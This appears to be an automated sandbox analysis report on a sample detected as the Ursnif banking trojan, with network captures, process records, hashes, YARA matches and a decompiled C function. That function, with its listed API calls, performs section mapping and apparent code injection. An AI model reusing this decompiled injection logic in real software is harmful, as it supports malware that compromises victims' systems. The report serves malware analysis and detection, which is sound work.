                                                                                                                                                                      Data Ascii: \"#fff\",\"#1a73e8\",\"#d1d1d1\",\"#fff\",null,1,null,14,500,\"#1967d2\",\"4px\",\"#1a73e8\",\"#eeeeee\"]",null,"%.@.[null,null,1],0,null,0,0]","en-GB","%.@.\"13px\",\"16px\",\"11px\"]","%.@.\"10px\",10,\"16px\",16]","%.@.\"14px\",14]","%.@.40]",null,"%.@


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.6 | 49752 | 142.250.102.106 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-14 14:03:24 UTC | 167 | OUT | GET /images/branding/googlelogo/2x/googlelogo_color_272x92dp.png HTTP/1.1
                                                                                                                                                                      Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                                                                                                      Referer: https://www.google.com/?gws_rd=ssl
                                                                                                                                                                      Accept-Language: en-US
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cookie: CONSENT=PENDING+509
2021-09-14 14:03:24 UTC | 168 | IN | HTTP/1.1 200 OK
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Content-Type: image/png
                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                      Content-Length: 13504
                                                                                                                                                                      Date: Tue, 14 Sep 2021 14:03:24 GMT
                                                                                                                                                                      Expires: Tue, 14 Sep 2021 14:03:24 GMT
                                                                                                                                                                      Cache-Control: private, max-age=31536000
                                                                                                                                                                      Last-Modified: Tue, 22 Oct 2019 18:30:00 GMT
                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                      Server: sffe
                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
7 | 192.168.2.6 | 49755 | 142.250.102.106 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-14 14:03:24 UTC | 182 | OUT | GET /gen_204?ei=rKtAYY2rHY25kwWZrp3YAw&vet=10ahUKEwiNsaLc0P7yAhWN3KQKHRlXBzsQhJAHCBQ..s&gl=GB&pc=SEARCH_HOMEPAGE&isMobile=false HTTP/1.1
                                                                                                                                                                      Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                                                                                                      Referer: https://www.google.com/?gws_rd=ssl
                                                                                                                                                                      Accept-Language: en-US
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cookie: CONSENT=PENDING+509
2021-09-14 14:03:24 UTC | 182 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                      Date: Tue, 14 Sep 2021 14:03:24 GMT
                                                                                                                                                                      Server: gws
                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
8 | 192.168.2.6 | 49757 | 142.250.102.106 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-14 14:03:24 UTC | 183 | OUT | GET /images/searchbox/desktop_searchbox_sprites318_hr.png HTTP/1.1
                                                                                                                                                                      Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                                                                                                      Referer: https://www.google.com/?gws_rd=ssl
                                                                                                                                                                      Accept-Language: en-US
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cookie: CONSENT=PENDING+509
2021-09-14 14:03:24 UTC | 183 | IN | HTTP/1.1 200 OK
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Content-Type: image/png
                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                      Content-Length: 779
                                                                                                                                                                      Date: Tue, 14 Sep 2021 14:03:24 GMT
                                                                                                                                                                      Expires: Tue, 14 Sep 2021 14:03:24 GMT
                                                                                                                                                                      Cache-Control: private, max-age=31536000
                                                                                                                                                                      Last-Modified: Wed, 22 Apr 2020 22:00:00 GMT
                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                      Server: sffe
                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                      Connection: close


                                                                                                                                                                      Code Manipulations

                                                                                                                                                                      Statistics

                                                                                                                                                                      CPU Usage

                                                                                                                                                                      Memory Usage

                                                                                                                                                                      Behavior

                                                                                                                                                                      System Behavior

                                                                                                                                                                      General

                                                                                                                                                                      Start time:16:02:47
                                                                                                                                                                      Start date:14/09/2021
                                                                                                                                                                      Path:C:\Users\user\Desktop\cd.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:'C:\Users\user\Desktop\cd.exe'
                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                      File size:3922432 bytes
                                                                                                                                                                      MD5 hash:CD02E745A08DD29CB6FDA1761B2F4B6E
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.408326958.0000000003138000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.408240054.0000000003138000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.407536237.0000000003138000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000002.429559902.0000000003138000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.408480874.0000000003138000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.408113887.0000000003138000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.407620205.0000000003138000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.408655668.0000000003138000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.408034062.0000000003138000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      Reputation:low

                                                                                                                                                                      General

                                                                                                                                                                      Start time:16:03:15
                                                                                                                                                                      Start date:14/09/2021
                                                                                                                                                                      Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                                                                                                                                                                      Imagebase:0x7ff721e20000
                                                                                                                                                                      File size:823560 bytes
                                                                                                                                                                      MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      General

                                                                                                                                                                      Start time:16:03:17
                                                                                                                                                                      Start date:14/09/2021
                                                                                                                                                                      Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4568 CREDAT:17410 /prefetch:2
                                                                                                                                                                      Imagebase:0xb20000
                                                                                                                                                                      File size:822536 bytes
                                                                                                                                                                      MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      Disassembly

                                                                                                                                                                      Code Analysis

                                                                                                                                                                        Executed Functions

                                                                                                                                                                        C-Code - Quality: 90%
                                                                                                                                                                        			E004022D1(void* __edx, void* __esi, intOrPtr* _a4, signed int _a8) {
                                                                                                                                                                        				void* _v8;
                                                                                                                                                                        				char _v12;
                                                                                                                                                                        				void* _v16;
                                                                                                                                                                        				signed int _v20;
                                                                                                                                                                        				int _v24;
                                                                                                                                                                        				void* _v28;
                                                                                                                                                                        				void* _v32;
                                                                                                                                                                        				char _v36;
                                                                                                                                                                        				void* _v40;
                                                                                                                                                                        				void* _v44;
                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                        				signed int _t107;
                                                                                                                                                                        				void* _t109;
                                                                                                                                                                        				void* _t111;
                                                                                                                                                                        				long _t116;
                                                                                                                                                                        				long _t117;
                                                                                                                                                                        				void* _t123;
                                                                                                                                                                        				void* _t126;
                                                                                                                                                                        				void* _t127;
                                                                                                                                                                        				int _t128;
                                                                                                                                                                        				unsigned int _t129;
                                                                                                                                                                        				void* _t134;
                                                                                                                                                                        				void* _t137;
                                                                                                                                                                        				void* _t140;
                                                                                                                                                                        				void* _t144;
                                                                                                                                                                        				signed int _t146;
                                                                                                                                                                        				void* _t152;
                                                                                                                                                                        				signed int _t158;
                                                                                                                                                                        				intOrPtr _t166;
                                                                                                                                                                        				void* _t167;
                                                                                                                                                                        				signed int _t168;
                                                                                                                                                                        				void* _t171;
                                                                                                                                                                        				void* _t172;
                                                                                                                                                                        				void* _t175;
                                                                                                                                                                        				void* _t176;
                                                                                                                                                                        
                                                                                                                                                                        				_t175 = __esi;
                                                                                                                                                                        				_t107 = _a8 & 0x00000010;
                                                                                                                                                                        				_v32 = 0;
                                                                                                                                                                        				_v16 = 0;
                                                                                                                                                                        				_v12 = 0;
                                                                                                                                                                        				_v28 = 0;
                                                                                                                                                                        				_v36 = E00402977;
                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                        				_v44 = _t107;
                                                                                                                                                                        				if(_t107 != 0 || ( *0x405478 & 0x00000001) == 0) {
                                                                                                                                                                        					_v20 =  *_t175;
                                                                                                                                                                        					_t109 =  *(_t175 + 0x10);
                                                                                                                                                                        					_t167 = _v20;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t167 =  *(__esi + 8);
                                                                                                                                                                        					_t109 =  *(__esi + 0x14);
                                                                                                                                                                        					_v36 = 0x405068;
                                                                                                                                                                        					_v20 = _t167;
                                                                                                                                                                        					_v8 = 1;
                                                                                                                                                                        				}
                                                                                                                                                                        				_v24 = _t109;
                                                                                                                                                                        				if(_t167 != 0) {
                                                                                                                                                                        					__eflags =  *_t167 - 0x5a4d;
                                                                                                                                                                        					if(__eflags == 0) {
                                                                                                                                                                        						L10:
                                                                                                                                                                        						_t111 =  *((intOrPtr*)(_t167 + 0x3c)) + _t167;
                                                                                                                                                                        						__eflags = _t111 - _t167;
                                                                                                                                                                        						if(_t111 < _t167) {
                                                                                                                                                                        							L36:
                                                                                                                                                                        							_v8 = 0xb;
                                                                                                                                                                        							L37:
                                                                                                                                                                        							__eflags = _v16;
                                                                                                                                                                        							if(_v16 == 0) {
                                                                                                                                                                        								L41:
                                                                                                                                                                        								__eflags = _v28;
                                                                                                                                                                        								if(_v28 == 0) {
                                                                                                                                                                        									L44:
                                                                                                                                                                        									__eflags = _v32;
                                                                                                                                                                        									if(_v32 != 0) {
                                                                                                                                                                        										memset(_v32, 0, _v24);
                                                                                                                                                                        										E00401759(_v32);
                                                                                                                                                                        									}
                                                                                                                                                                        									goto L46;
                                                                                                                                                                        								}
                                                                                                                                                                        								_push(_v28);
                                                                                                                                                                        							}
                                                                                                                                                                        							_push(_v16);
                                                                                                                                                                        							_t116 = NtUnmapViewOfSection(0xffffffff); // executed
                                                                                                                                                                        							_t117 = RtlNtStatusToDosError(_t116);
                                                                                                                                                                        							asm("loopne 0x42");
                                                                                                                                                                        							_t97 = _t152 + 0x7400e87d;
                                                                                                                                                                        							 *_t97 =  *(_t152 + 0x7400e87d) + _t117 + 1;
                                                                                                                                                                        							__eflags =  *_t97;
                                                                                                                                                                        							goto L41;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t166 = _t111 + 0xf8;
                                                                                                                                                                        						__eflags = _t166 - _t167 + _v24;
                                                                                                                                                                        						if(_t166 >= _t167 + _v24) {
                                                                                                                                                                        							goto L36;
                                                                                                                                                                        						}
                                                                                                                                                                        						__eflags = _v8;
                                                                                                                                                                        						_t158 =  *(_t111 + 4) & 0x0000ffff;
                                                                                                                                                                        						if(_v8 == 0) {
                                                                                                                                                                        							__eflags = _t158 - 0x14c;
                                                                                                                                                                        							if(_t158 == 0x14c) {
                                                                                                                                                                        								L14:
                                                                                                                                                                        								_t152 =  *((intOrPtr*)(_t111 + 0x50)) + 0x00000fff & 0xfffff000;
                                                                                                                                                                        								_t123 = E0040202A( *(_t175 + 0x14) + _t152 +  *(_t175 + 0x10) + 0xc50,  &_v16,  &_v28); // executed
                                                                                                                                                                        								__eflags = _t123;
                                                                                                                                                                        								_v8 = _t123;
                                                                                                                                                                        								if(_t123 != 0) {
                                                                                                                                                                        									goto L37;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t168 =  *0x405490; // 0x736c6e70
                                                                                                                                                                        								_t171 = _t152 + (_t168 ^ 0x736c6220) + _v16;
                                                                                                                                                                        								_v40 = _t171;
                                                                                                                                                                        								_t126 = E0040171A(_v28,  *_a4,  &_v12); // executed
                                                                                                                                                                        								__eflags = _t126;
                                                                                                                                                                        								_v8 = _t126;
                                                                                                                                                                        								if(_t126 != 0) {
                                                                                                                                                                        									goto L37;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t127 = E00402629(_v16, _v20, _v12);
                                                                                                                                                                        								__eflags = _t127;
                                                                                                                                                                        								_v8 = _t127;
                                                                                                                                                                        								if(_t127 != 0) {
                                                                                                                                                                        									goto L37;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t128 =  *(_t175 + 0x10);
                                                                                                                                                                        								__eflags = _t128;
                                                                                                                                                                        								if(_t128 != 0) {
                                                                                                                                                                        									memcpy(_t171,  *_t175, _t128);
                                                                                                                                                                        									_t176 = _t176 + 0xc;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t129 =  *(_t175 + 0x14);
                                                                                                                                                                        								__eflags = _t129;
                                                                                                                                                                        								if(_t129 == 0) {
                                                                                                                                                                        									L26:
                                                                                                                                                                        									_t172 = _t152 + _v16;
                                                                                                                                                                        									asm("cdq");
                                                                                                                                                                        									 *((intOrPtr*)(_t172 + 0x30)) = _v12;
                                                                                                                                                                        									 *((intOrPtr*)(_t172 + 0x34)) = _t166;
                                                                                                                                                                        									memcpy(_t172 + 0x18, _t175, 0x18);
                                                                                                                                                                        									_t176 = _t176 + 0xc;
                                                                                                                                                                        									__eflags =  *(_t175 + 0x10);
                                                                                                                                                                        									if( *(_t175 + 0x10) != 0) {
                                                                                                                                                                        										asm("cdq");
                                                                                                                                                                        										 *(_t172 + 0x18) = _t152 + _v12 + 0xc50;
                                                                                                                                                                        										 *((intOrPtr*)(_t172 + 0x1c)) = _t166;
                                                                                                                                                                        									}
                                                                                                                                                                        									__eflags =  *(_t175 + 0x14);
                                                                                                                                                                        									if( *(_t175 + 0x14) != 0) {
                                                                                                                                                                        										_t140 = _v12 + _t152;
                                                                                                                                                                        										__eflags = _t140;
                                                                                                                                                                        										asm("cdq");
                                                                                                                                                                        										 *((intOrPtr*)(_t172 + 0x20)) = _t140 +  *(_t175 + 0x10) + 0xc50;
                                                                                                                                                                        										 *((intOrPtr*)(_t172 + 0x24)) = _t166;
                                                                                                                                                                        									}
                                                                                                                                                                        									__eflags = _v44;
                                                                                                                                                                        									if(_v44 != 0) {
                                                                                                                                                                        										L33:
                                                                                                                                                                        										_t134 = E004020E9(_t166, _t172);
                                                                                                                                                                        										goto L34;
                                                                                                                                                                        									} else {
                                                                                                                                                                        										__eflags =  *0x405478 & 0x00000001;
                                                                                                                                                                        										if(( *0x405478 & 0x00000001) == 0) {
                                                                                                                                                                        											goto L33;
                                                                                                                                                                        										}
                                                                                                                                                                        										_push( *_a4);
                                                                                                                                                                        										_t134 = E0040258A(_t166, _t172);
                                                                                                                                                                        										L34:
                                                                                                                                                                        										__eflags = _t134;
                                                                                                                                                                        										_v8 = _t134;
                                                                                                                                                                        										if(__eflags == 0) {
                                                                                                                                                                        											_t89 =  &_v36; // 0x402977
                                                                                                                                                                        											memcpy(_t172 + 0x40,  *_t89, 0x800);
                                                                                                                                                                        											_t176 = _t176 + 0xc;
                                                                                                                                                                        											_t154 = _t152 + _v12;
                                                                                                                                                                        											_t152 = _t152 + _v12 + 0x40;
                                                                                                                                                                        											_t137 = E004027D6(_t166, __eflags, _a4, _t152, _t154, _a8); // executed
                                                                                                                                                                        											_v8 = _t137;
                                                                                                                                                                        										}
                                                                                                                                                                        										goto L37;
                                                                                                                                                                        									}
                                                                                                                                                                        								} else {
                                                                                                                                                                        									_t144 = _t129 >> 2;
                                                                                                                                                                        									__eflags = _t144;
                                                                                                                                                                        									_v20 = _t144;
                                                                                                                                                                        									if(_t144 == 0) {
                                                                                                                                                                        										goto L26;
                                                                                                                                                                        									}
                                                                                                                                                                        									while(1) {
                                                                                                                                                                        										_t146 = _v20 << 2;
                                                                                                                                                                        										_t57 =  &_v20;
                                                                                                                                                                        										 *_t57 = _v20 - 1;
                                                                                                                                                                        										__eflags =  *_t57;
                                                                                                                                                                        										_t166 = _t171 + _t146;
                                                                                                                                                                        										 *((intOrPtr*)(_t166 +  *(_t175 + 0x10) - 4)) =  *((intOrPtr*)(_t146 +  *((intOrPtr*)(_t175 + 8)) - 4));
                                                                                                                                                                        										if( *_t57 == 0) {
                                                                                                                                                                        											goto L26;
                                                                                                                                                                        										}
                                                                                                                                                                        										_t171 = _v40;
                                                                                                                                                                        									}
                                                                                                                                                                        									goto L26;
                                                                                                                                                                        								}
                                                                                                                                                                        							}
                                                                                                                                                                        							L23:
                                                                                                                                                                        							_v8 = 0xb;
                                                                                                                                                                        							goto L44;
                                                                                                                                                                        						}
                                                                                                                                                                        						__eflags = _t158 - 0x8664;
                                                                                                                                                                        						if(_t158 != 0x8664) {
                                                                                                                                                                        							goto L23;
                                                                                                                                                                        						}
                                                                                                                                                                        						goto L14;
                                                                                                                                                                        					}
                                                                                                                                                                        					_push(_v24);
                                                                                                                                                                        					_t152 = E004017EF(_t109, _t152, __eflags);
                                                                                                                                                                        					__eflags = _t152;
                                                                                                                                                                        					_v32 = _t152;
                                                                                                                                                                        					if(_t152 != 0) {
                                                                                                                                                                        						E00401D33(_t152, _t167, _v24,  *0x40548c, 0);
                                                                                                                                                                        						_v20 = _t152;
                                                                                                                                                                        						_t167 = _t152;
                                                                                                                                                                        						goto L10;
                                                                                                                                                                        					}
                                                                                                                                                                        					_v8 = 8;
                                                                                                                                                                        					goto L44;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_v8 = 2;
                                                                                                                                                                        					L46:
                                                                                                                                                                        					return _v8;
                                                                                                                                                                        				}
                                                                                                                                                                        			}
                                                                                                                                                                        0x00402380
                                                                                                                                                                        0x00402535
                                                                                                                                                                        0x00402535
                                                                                                                                                                        0x0040253c
                                                                                                                                                                        0x0040253c
                                                                                                                                                                        0x00402540
                                                                                                                                                                        0x00402554
                                                                                                                                                                        0x00402554
                                                                                                                                                                        0x00402558
                                                                                                                                                                        0x00402563
                                                                                                                                                                        0x00402563
                                                                                                                                                                        0x00402567
                                                                                                                                                                        0x00402571
                                                                                                                                                                        0x0040257c
                                                                                                                                                                        0x0040257c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402567
                                                                                                                                                                        0x0040255a
                                                                                                                                                                        0x0040255a
                                                                                                                                                                        0x00402542
                                                                                                                                                                        0x00402547
                                                                                                                                                                        0x0040254e
                                                                                                                                                                        0x00402550
                                                                                                                                                                        0x00402553
                                                                                                                                                                        0x00402553
                                                                                                                                                                        0x00402553
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402553
                                                                                                                                                                        0x0040238b
                                                                                                                                                                        0x00402391
                                                                                                                                                                        0x00402393
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402399
                                                                                                                                                                        0x0040239d
                                                                                                                                                                        0x004023a1
                                                                                                                                                                        0x00402456
                                                                                                                                                                        0x0040245b
                                                                                                                                                                        0x004023b2
                                                                                                                                                                        0x004023c1
                                                                                                                                                                        0x004023d9
                                                                                                                                                                        0x004023de
                                                                                                                                                                        0x004023e0
                                                                                                                                                                        0x004023e3
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004023e9
                                                                                                                                                                        0x00402403
                                                                                                                                                                        0x00402406
                                                                                                                                                                        0x00402409
                                                                                                                                                                        0x0040240e
                                                                                                                                                                        0x00402410
                                                                                                                                                                        0x00402413
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402422
                                                                                                                                                                        0x00402427
                                                                                                                                                                        0x00402429
                                                                                                                                                                        0x0040242c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402432
                                                                                                                                                                        0x00402435
                                                                                                                                                                        0x00402437
                                                                                                                                                                        0x0040243d
                                                                                                                                                                        0x00402442
                                                                                                                                                                        0x00402442
                                                                                                                                                                        0x00402445
                                                                                                                                                                        0x00402448
                                                                                                                                                                        0x0040244a
                                                                                                                                                                        0x0040248c
                                                                                                                                                                        0x0040248f
                                                                                                                                                                        0x00402495
                                                                                                                                                                        0x00402498
                                                                                                                                                                        0x004024a0
                                                                                                                                                                        0x004024a3
                                                                                                                                                                        0x004024a8
                                                                                                                                                                        0x004024ab
                                                                                                                                                                        0x004024af
                                                                                                                                                                        0x004024bb
                                                                                                                                                                        0x004024bc
                                                                                                                                                                        0x004024bf
                                                                                                                                                                        0x004024bf
                                                                                                                                                                        0x004024c2
                                                                                                                                                                        0x004024c6
                                                                                                                                                                        0x004024ce
                                                                                                                                                                        0x004024ce
                                                                                                                                                                        0x004024d7
                                                                                                                                                                        0x004024d8
                                                                                                                                                                        0x004024db
                                                                                                                                                                        0x004024db
                                                                                                                                                                        0x004024de
                                                                                                                                                                        0x004024e2
                                                                                                                                                                        0x004024fa
                                                                                                                                                                        0x004024fb
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004024e4
                                                                                                                                                                        0x004024e4
                                                                                                                                                                        0x004024eb
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004024f0
                                                                                                                                                                        0x004024f3
                                                                                                                                                                        0x00402500
                                                                                                                                                                        0x00402500
                                                                                                                                                                        0x00402502
                                                                                                                                                                        0x00402505
                                                                                                                                                                        0x0040250c
                                                                                                                                                                        0x00402513
                                                                                                                                                                        0x0040251b
                                                                                                                                                                        0x00402521
                                                                                                                                                                        0x00402524
                                                                                                                                                                        0x0040252b
                                                                                                                                                                        0x00402530
                                                                                                                                                                        0x00402530
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402505
                                                                                                                                                                        0x0040244c
                                                                                                                                                                        0x0040244c
                                                                                                                                                                        0x0040244c
                                                                                                                                                                        0x0040244f
                                                                                                                                                                        0x00402452
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402470
                                                                                                                                                                        0x00402476
                                                                                                                                                                        0x00402479
                                                                                                                                                                        0x00402479
                                                                                                                                                                        0x00402479
                                                                                                                                                                        0x0040247c
                                                                                                                                                                        0x00402486
                                                                                                                                                                        0x0040248a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040246d
                                                                                                                                                                        0x0040246d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402470
                                                                                                                                                                        0x0040244a
                                                                                                                                                                        0x00402461
                                                                                                                                                                        0x00402461
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402461
                                                                                                                                                                        0x004023a7
                                                                                                                                                                        0x004023ac
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004023ac
                                                                                                                                                                        0x00402343
                                                                                                                                                                        0x0040234b
                                                                                                                                                                        0x0040234d
                                                                                                                                                                        0x0040234f
                                                                                                                                                                        0x00402352
                                                                                                                                                                        0x0040236f
                                                                                                                                                                        0x00402374
                                                                                                                                                                        0x00402377
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402377
                                                                                                                                                                        0x00402354
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402330
                                                                                                                                                                        0x00402330
                                                                                                                                                                        0x00402581
                                                                                                                                                                        0x00402587
                                                                                                                                                                        0x00402587

APIs
• memcpy.NTDLL(?,?,?,?,?,00000000,00401B14,00000000,00000000,?,?,00401B14,?,00000000), ref: 0040243D
• memcpy.NTDLL(?,?,00000018,?,?,00000000,00401B14,00000000,00000000,?,?,00401B14,?,00000000), ref: 004024A3
• memcpy.NTDLL(?,w)@,00000800,?,00401B14,?,00000000), ref: 00402513
  • Part of subcall function 0040202A: NtCreateSection.NTDLL ref: 00402085
  • Part of subcall function 0040202A: memset.NTDLL ref: 004020AA
  • Part of subcall function 0040202A: ZwClose.NTDLL(?), ref: 004020DA
  • Part of subcall function 0040171A: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 00401747
  • Part of subcall function 0040171A: RtlNtStatusToDosError.NTDLL ref: 0040174E
                                                                                                                                                                        • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 00402547
                                                                                                                                                                        • RtlNtStatusToDosError.NTDLL ref: 0040254E
                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(00000000,?,00000000), ref: 0040255D
                                                                                                                                                                        • memset.NTDLL ref: 00402571
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Sectionmemcpy$CloseErrorStatusViewmemset$ChangeCreateFindNotificationUnmap
                                                                                                                                                                        • String ID: pnls$w)@
                                                                                                                                                                        • API String ID: 724331112-2680927416
                                                                                                                                                                        • Opcode ID: 8be9d17189d34d3643d16771b9c5462e74dec51dfc883c8e6551046c8acdf72a
                                                                                                                                                                        • Instruction ID: bd930ac68285c61fd66731e6645eefbb964c4e59fcd4f8463753af5a5e12df5e
                                                                                                                                                                        • Opcode Fuzzy Hash: 8be9d17189d34d3643d16771b9c5462e74dec51dfc883c8e6551046c8acdf72a
                                                                                                                                                                        • Instruction Fuzzy Hash: 74915D7190020AEBCB10DF94DA88BAEBBB1FF04304F14457AE805B73D1D7B8AA45DB58
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,00000992,00003000,00000040,00000992,004354D6), ref: 00435AAE
                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000062,00003000,00000040,00435510), ref: 00435AE5
